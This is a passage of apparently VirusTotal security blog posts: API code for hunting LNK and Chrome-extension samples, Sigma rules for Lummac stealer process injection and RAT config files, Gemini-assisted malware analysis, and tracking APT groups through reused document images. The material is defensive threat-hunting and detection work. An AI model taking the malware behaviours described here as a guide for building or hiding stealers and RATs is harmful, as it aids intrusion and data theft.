# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")
Step 2
import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())
Step 3
!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except:
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()

World heatmap of submissions

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

  • Find malicious Chrome extensions (based on this blog):

This specific question is actually a really good example of how Google Colab will run the step-by-step process. As you can see, we asked different questions in the same prompt, for that reason Gemini will do it in different steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1
query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")
Step 2
import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()
Step 3
import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")
  • Retrieve threat actors:
Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.
  • Investigate campaigns:
Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from Sentinel LABS, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We’ll be updating the content of our meta colab regularly and will share more information soon about how to get the Google Colab.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.

Continue reading Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

We are excited to announce that our colleague Joseliyo Sánchez, will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher,… Continue reading Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

Research that builds detections

Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families – but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.
In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I’ll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOCs and IRs teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.
But there’s another really cool way to use VirusTotal – for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.
To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified it and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors – as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.
A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.
One approach is to hunt for files that are flagged by at least five different AV vendors, were recently uploaded within the last month, have sandbox execution (in order to view their behavior), and which have not triggered any Crowdsourced Sigma rules.
p:5+ have:behavior fs:30d+ not have:sigma
This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), filtering results to only include documents (type:document), or identifying communication with services like Pastebin (behavior_network:pastebin.com).
Another way to go is to look at files that have been flagged by at least five AV’s and were tested in either Zenbox or CAPE. These sandboxes often have great logs produced by Sysmon, which are really useful for figuring out how to spot these threats. Again, we’d want to focus on files uploaded in the last month that haven’t triggered any Sigma rules. This gives us a good starting point for building new detection rules.
p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma
Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts – and no more than two low severity ones.
p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-
With these queries, we can start investigating some samples that may be interesting to create detection rules.

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma’s official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
  id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
  status: experimental
  description: Detects the execution of more.com and vbc.exe in the process tree. This behaviors was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
  references:
      - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
      - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
      - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-14
  tags:
      - attack.defense-evasion
      - attack.t1055
  logsource:
      category: process_creation
      product: windows
  detection:
      # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
      selection_parent:
          ParentImage|endswith: '\more.com'
      selection_child:
          - Image|endswith: '\vbc.exe'
          - OriginalFileName: 'vbc.exe'
      condition: all of selection_*
  falsepositives:
      - Unknown
  level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
} 

File Creation Related To RAT Clients

title: File Creation Related To RAT Clients
  id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
  status: experimental
  description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
  references:
      - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
      - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-15
  tags:
      - attack.execution
  logsource:
      category: file_event
      product: windows
  detection:
      # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
      # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
      selection_required:
          TargetFilename|contains: '\AppData\Roaming\'
      selection_variants:
          TargetFilename|endswith:
              - '\datalogs.conf'
              - '\hvnc.conf'
              - '\dcrat.conf'
          TargetFilename|contains:
              - '\mydata\'
              - '\datalogs\'
              - '\hvnc\'
              - '\dcrat\'
      condition: all of selection_*
  falsepositives:
      - Legitimate software creating a file with the same name
  level: high

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. Applying our approach can benefit in the development of detection on the latest behaviors that do not currently have developed detection mechanisms. This could potentially help organizations be proactive in creating detections based on threat hunting missions.
The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma’s public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:
Lummac Stealer Activity – Execution Of More.com And Vbc.exe

sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c

File Creation Related To RAT Clients

sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252

We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.

Continue reading Research that builds detections

Leveraging LLMs for Malware Analysis: Insights and Future Directions

By Gerardo Fernández, Joseliyo Sánchez and Vicente Díaz
Malware analysis is (probably) the most expert-demanding and time-consuming activity for any security professional. Unfortunately automation for static analysis has always been challenging for the security industry. The sheer volume and complexity of malicious code necessitate innovative approaches for efficient and effective analysis. At VirusTotal, we’ve been exploring the potential of Large Language Models (LLMs) to revolutionize malware analysis. We started this path last April 2023 by automatically analyzing malicious scripts, and since then, we evolved our model to analyze Windows executable files. In this post, we want to share part of our current research and findings, as well as discuss future directions in this challenging approach.

Our approach

As a parallel development to the architecture described in our previous post, we wanted to better understand what are the strengths and limitations of LLMs when analyzing PE files. Our initial approach using memory dumps from sandbox detonation and backscatter for additional deobfuscation capabilities (which will likely be the biggest challenge for the analysis) sounds like a great approach, however rebuilding binaries from memory dumps has its own problems and all this process takes additional time and computational resources – maybe it won’t be necessary for every sample! Thus, the importance of understanding what LLMs can and can’t do when faced with a decompiled (or disassembled) binary.
We also want to consider additional tools we might use to provide the LLMs with additional context, including our sandbox analysis. For decompilation we will be using Hex-Rays IDA Pro most of the time, however our approach will be using a “decision tree” to optimize what tools, prompts and additional context to use in every case.
Our LLM of choice will be Gemini 1.5. The extended token capabilities is what in essence allows us to analyze decompiled and disassembled code, as well as providing additional context on top of any prompt we use.

Malware analysis

To get some understanding of the malware analysis capabilities of Gemini, we used a set of samples for different representative malware families. We used backscatter to determine the malware family every sample belonged to, and we chose only malicious samples for this part of the experiment. When the LLM was asked if the samples were malicious, these are the results per family:

Results per family
The global result is that LLMs agreed on maliciousness 84% of the time, couldn’t determine (unknown) 12%, and provided a False Negative 4%.
It is interesting to note how results greatly vary amongst families, however this was suspected as different malware uses different obfuscation/packing/encryption methods. For instance, Nanocore uses AutoIT to build their binaries, something that the LLM is not ready to deal with natively. This is a good example of how we build our decision tree – if AutoIT is detected, we definitely will need to unpack first.
One of the biggest advantages of LLMs is that they can provide a full explanation of the reasoning behind a verdict. For “unknown” maliciousness, it is interesting to note that the analysis included several red flags detected by the LLM, however they were not enough to go for a “malicious” verdict. We believe this can also be fine tuned with better prompting, adjusting temperature and further training.
We also found illustrative examples during our analysis. For instance, for some njRAT samples, the LLM returned some IOCs, as seen in the image below:

Information returned by the LLM
Interestingly, they are provided “right to left”. We also believe that we can improve mechanisms to double check IOCs, for instance through the use of API Function Calls to VirusTotal.
In best case scenario, like when analyzing some Mirai samples, the output from the LLM will provide all details, including all the commands accepted by the malware:

Output related to Mirai

Consistent Output

Given LLMs are non deterministic, one of the difficulties in analyzing LLM output is providing consistent results. We found this specially relevant in some families, being Qakbot one example: when the LLM cannot analyze parts of the code given to obfuscation/encryption, it naturally focuses on the rest, meaning that the output describing the capabilities varies drastically between samples. Although this is understandable and solvable through the decision tree to provide the LLM with a more consistent input, we also would like to explore how we can get a more consistent output.
We explored what we initially thought would be a good idea: asking Gemini to provide its output using CAPA ontology. This would provide a reasonable answer from the LLM by standardizing its output using a series of well defined capabilities, as well as allow us to compare results with our sandbox output, which would allow us to double-check the integrity of LLM’s results.
This idea, unfortunately, didn’t work as expected. There are many capabilities that are easy to detect dynamically in execution but difficult to identify statically and vice versa. Additionally, CAPA’s output is based on a series of rules (similar to YARA), which don’t necessarily work consistently for every single capability.

Prompt evolution

This was one of the key points during our research. We’ve experimented with various prompt engineering techniques to improve the accuracy and comprehensiveness of LLM-generated analysis reports, increasingly adding additional context to the LLM. As we progressed in the investigation, we started providing dynamic execution details along with the decompiled code, providing way better results: at the end of the day, this allows us to combine both dynamic and static analysis.
Encouraged with the good results, we added more context information from what we knew about the sample in VirusTotal: details on related IOCs, configuration extracted from the samples, etc. For example, if the analyzed sample drops another file during execution, we can provide the full VirusTotal report of said dropped. This can help disambiguate situations where other security tools hesitate if the sample is a legitimate installer or drops malware, which is of great relevance. However, we also discovered that we need to be very cautious about the information we provide in the prompt, as this might lead to the LLM biasing its analysis based on it. For instance, if *seems* it might give more weight to some details provided in the prompt that could affect its analysis of the code.
We found that a good solution to both provide all the needed details to the LLM without biasing its answer was using Gemini’s function calling, which allows Gemini to dynamically request context data as needed using API calls to VirusTotal.

Conclusion

Our ongoing research into LLM-powered malware analysis has yielded promising results, demonstrating the potential of this technology to transform the way we detect and respond to threats. While challenges remain, we’re confident that continued advancements in LLMs, our understanding of their capabilities and our improvement in our analysis decision tree will lead to even more effective and efficient malware analysis solutions.
Importantly, we believe that LLM analysis is not intended to replace human reverse engineers anyhow, but rather to augment their capabilities. By automating routine tasks and providing valuable insights, LLMs can empower analysts to focus on more complex and critical aspects of malware analysis, ultimately enhancing our collective ability to combat cyber threats. In addition, LLM capabilities can be of great help for most security practitioners without the in-depth knowledge necessary for reverse engineering or without the need of getting a profound understanding of every single aspect of the malware analyzed.
We’re committed to sharing our findings with the security community and collaborating with researchers and practitioners to further advance the field of LLM-driven malware analysis. As we continue to explore the possibilities of this exciting technology, we’re optimistic about the future of AI-powered malware analysis.

Continue reading Leveraging LLMs for Malware Analysis: Insights and Future Directions

Tracking Threat Actors Using Images and Artifacts

When tracking adversaries, we commonly focus on the malware they employ in the final stages of the kill chain and infrastructure, often overlooking samples used in the initial ones.
In this post, we will explore some ideas to track adversary activity leveraging images and artifacts mostly used during delivery. We presented this approach at the FIRST CTI in Berlin and at Botconf in Nice.

Hunting early

In threat hunting and detection engineering activities, analysts typically focus heavily on the latter stages of the kill chain – from execution to actions on objectives (Figure 1). This is mainly because there is more information available about adversaries in these phases, and it’s easier to search for clues using endpoint detection and response (EDR), security information and event management (SIEM), and other solutions.

Figure 1: Stages of the kill chain categorized by their emphasis on threat hunting and detection engineering.
We have been exploring ideas to improve our hunting focused on samples built in the weaponization phase and distributed in the delivery phase, focused on the detection of suspicious Microsoft Office documents (Word, Excel, and PowerPoint), PDF files, and emails.
In threat intelligence platforms and cybersecurity in general, green and red colors are commonly used to quickly indicate results and identify whether or not something is malicious. This is because they are perceived as representing good or bad, respectively.
Multiple studies in psychology have demonstrated how colors can influence our decision-making process. VirusTotal, through the third-party engines integrated into it, shows users when something is detected and therefore deemed “malicious,” and when something is not detected and considered “benign.”
For example, the sample in Figure 2 belongs to a Microsoft Word document distributed by the SideWinder group during the year 2024.

Figure 2: Document used by the SideWinder APT group
The sample in question was identified at the time of writing this post by 31 antivirus engines, leaving no doubt that it is indeed a real malware sample. In the process of pivoting to identify new samples or related infrastructure, starting with Figure 2, the analyst will likely click on the URL detected by 11 out of the 91 engines, and the domains detected by 17 and 15 engines, respectively, to see if there are other samples communicating with them. The remaining two domains (related to windows.com and live.com) in this case are easily identified as legitimate domains that were likely contacted by the sandbox during its execution.

Figure 3: Relationships within the SideWinder APT group document
In the same sample, if you go down in the VirusTotal report (Figure 3), the analyst will likely click on the ZIP file listed as “compressed parent” to check if there are other samples within this ZIP besides the current one. They may also click on the XML file detected by 8 engines, and the LNK file detected by 4 engines. The remaining files in the bundled files section probably won’t be clicked, as the green color indicates they are not malicious, and also because they have less enticing formats — mainly XML and JPEG. But what if we explore them?

XML files generated by Microsoft Office

When you create a new Microsoft Office file, it automatically generates a series of embedded XML files containing information about the document. Additionally, if you use images in the document, they are also embedded within it. Microsoft Office files are compressed files (similar to ZIP files). In VirusTotal, when a Microsoft Word file is uploaded, you can see all these embedded files in the embedded files section.
We have mainly focused on three types of embedded files within Office documents:
  • Images:Many threat actors use images related to the organizations or entities they intend to impersonate. They do this to make documents appear legitimate and gain the trust of their victims.

  • [Content_Types].xml:This file specifies the content types and relationships within the Office Open XML (OOXML) document. It essentially defines the types of content and how they are organized within the file structure.

  • Styles.xml:Stores stylistic definitions for your document. These styles provide consistent formatting instructions for fonts, paragraph spacing, colors, numbering, lists, and much more.

Our hypothesis is: If malicious Microsoft Word documents are copied and pasted during the weaponization building process, with only the content being modified, the hashes of the [Content_Types].xml and styles.xml files will likely remain the same.

Office documents

To check our hypothesis, we selected a set of samples used during delivery and belonging the threat actors listed in Figure 4:

Figure 4: Number of samples per actor within the scope
Let’s analyze some of the results we obtained per actor.

APT28 – Images

We started by focusing on images APT28 has reused for different delivery samples (Figure 5).

Figure 5: Images shared in multiple documents by APT28
Each line in the Figure 5 graph represents the same image, and each point represents at least two samples that used that particular image.
The second image of the graph shows how it was used by different Office documents at different points in time, from 2018 to 2022 (dates related to their upload to VirusTotal).
Now, the chart in Figure 6 visualizes each of these images.

Figure 6: Content of the images shared in multiple documents by APT28
  • The first image is just a simple line with no particular meaning. It’s embedded in over 100 files known by VirusTotal.

  • The second image is a hand and has 14 compressed parents.

  • The third image consists of black circles and also has over 100 compressed parents.

  • The last image is like a Word page with a table, presenting a fake EDA Roadmap of the European Commission. The image format is EMF (an old format) and it has 4 compressed parents

If we delve into the compressed parents of the second image (the one with the hand), we can see how the image is used in Office documents that are part of a campaign reported by Mandiant attributed to APT28. The image of the hand was used in fake Word documents for hotel reservations, particularly in a small section where the client was supposed to sign.

Figure 7: Pivoting through a specific image used by APT28

SideWinder – Images

SideWinder (aka RAZER TIGER) is a group focused on carrying out operations against military targets in Pakistan. This group traditionally reused images, which might help monitoring their activity.

Figure 8: Images shared in multiple documents by RAZOR TIGER
In particular, the image in Figure 9 was used in a sample uploaded in September 2021 and in a second one uploaded March 2022. The image in question is the signature of Baber Bilal Haider.

Figure 9: Two different samples of RAZOR TIGER share the same image of a handwritten signature

Gamaredon – [Content_Types].xml and styles.xml

For Gamaredon we found they reused styles.xml and [Content_Types].xml in different documents, which helped reveal new samples.
Figure 10 chart displays all the [Content_Types].xml files from Gamaredon’s Office documents.

Figure 10: [Content_Types].xml shared in multiple documents by Gamaredon Group
There are a large number of samples that share the same [Content_Types].xml. It’s important to highlight that these [Content_Types].xml files are not necessarily exclusively used by Gamaredon, and can be found in other legitimate files created by users worldwide. However, some of these [Content_Types].xml might be interesting to monitor.
Styles.xml files are usually less generic, which should make them a better candidate to monitor:

Figure 11: Styles.xml shared in multiple documents by Gamaredon Group
We see styles.xml files are less reused than [Content_Types].xml. This could be because some of the samples used by this actor for distribution are created from scratch or reusing legitimate documents.
We used identified patterns in the styles.xml files to launch a retrohunt on VirusTotal. Figure 12 visually represents the original set of style.xml files (left) and those that were added later after running the retrohunt (right).

Figure 12: Initial graph of the styles.xml and its parents used by Gamaredon (left). Final graph after identifying new styles.xml and their parents using retrohunt in VirusTotal (right)
One of the new styles.xml files found in our retrohunt has 17 compressed parents, meaning it was included in 17 Office files.

Figure 13: Number of parent documents for a specific styles.xml file used by Gamaredon
All the parents were malicious, some of them identical and the rest very similar between them. The content of many of them referred to “Foreign institutions of Ukraine – Embassy of Ukraine in Hungary,” containing a table with phone numbers and information about the embassy, such as social media links and email accounts. Here’s an example:

Figure 14: Document used by Gamaredon in one of its campaigns that includes multiple images which can be used to monitor new samples
The information for social media includes the logos of these platforms, such as the Facebook logo, Skype logo, an image of a telephone, etc. By pivoting, on the image of the Facebook icon, we find that it has 12 additional compressed parents, meaning it appears in 12 documents, all of them sharing the same styles.xml file.
Visualizing all together, we find a set of about 12-14 images used within the same timeframe by the actor. All of these images can be found in the “Embassy of Ukraine in Hungary” document.

Figure 15: Pivoting through the Facebook image that included the document in Figure 14
There’s a pattern evident in the previous image where different images were included in files uploaded simultaneously. This pattern is associated with multiple documents used in the same campaign of the Embassy of Ukraine in Hungary, all of them were using the same social media images explained before.

Styles.xml shared between threat actors

Another aspect we explored was if different threat actors shared similar styles.xml files in their documents. Styles.xml files are somewhat more specific and unique than [Content_Types].xml files because they can contain styles created by threat actors or by legitimate entities that originally created the document and then were modified by the actor. This makes them stand out more and can help in identifying threat actor activity.
This doesn’t necessarily imply they share information to conduct separate operations, although in some cases, it could be a scenario worth considering.

Figure 16: styles.xml shared between different threat actors
Of all styles.xml files related to actors in our initial set, only six of them were found to be shared by at least two actors. Some styles defined by the styles.xml file are very generic and could identify almost any type of file. However, there are others that could be interesting to explore further.
An interesting case is the Styles.xml file, which seems to be shared by Razor Tiger, APT28, and UAC-0099. Specifically, the samples from APT28 and UAC-0099 are attract because they were uploaded to VirusTotal within short time frames, suggesting they might belong to the same threat actor.
You can see the list of hashes in the appendix of this blog

[Content_Types].xml shared between threat actors

Like in the previous case, we checked if there were Office documents among different threat actors sharing [Content_Types].xml:

Figure 17: [Content_Types].xml shared between different threat actors
In this case, there are eleven [Content_Types].xml files that are shared by at least two different actors.
An interesting case here is the file dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a, which is shared by Gamaredon, APT37, Mustang Panda, APT28, SideCopy, and UAC-0099. Again, there could be different explanations for this.
Another interesting case that is worth analyzing in detail is [Content_Types].xml with hash 4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d, which is only shared by APT28 and APT29.
You can see the list of hashes in the appendix of this blog

AI to the rescue

The images reused by attackers seem to be a promising idea we decided to further explore.
We used the VirusTotal API to download and unzip a set of Office documents used for delivery, this way we obtained all the images. Then we used Gemini to automatically describe what these images were about.

Figure 18: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors
Figure 18 shows some examples of images that were incorporated by certain actors. There were also other results that were not helpful, mainly related to images that did not show a logo or anything specific that indicated what they were.

Figure 19: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors
Using the VirusTotal API to obtain documents that you might be looking for and combining the results with Gemini to analyze possible images automatically, can potentially help analysts to monitor potential suspicious documents and create your own database of samples using specific images, for example Government images or specific images about companies. This approach is interesting not only for threat hunting but also for brand monitoring.

PDF Documents

Images dropped by Acrobat Reader

Unlike Office documents, PDF files don’t contain embedded XML files or images, although some PDF files may be created from Office documents. Some of our sandboxes include Adobe Acrobat Reader to open PDF documents which generates a thumbnail of the first page in BMP format. This image is stored in the directory C:\Users\\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons. Consequently, our sandboxes provide this BMP image as a dropped file from the PDF, allowing us to pivot.
To illustrate this functionality, see Figure 20 attributed to Blind Eagle, a cybercrime actor associated with Latin America.

Figure 20: Content of a PDF file related to Blind Eagle threat actor
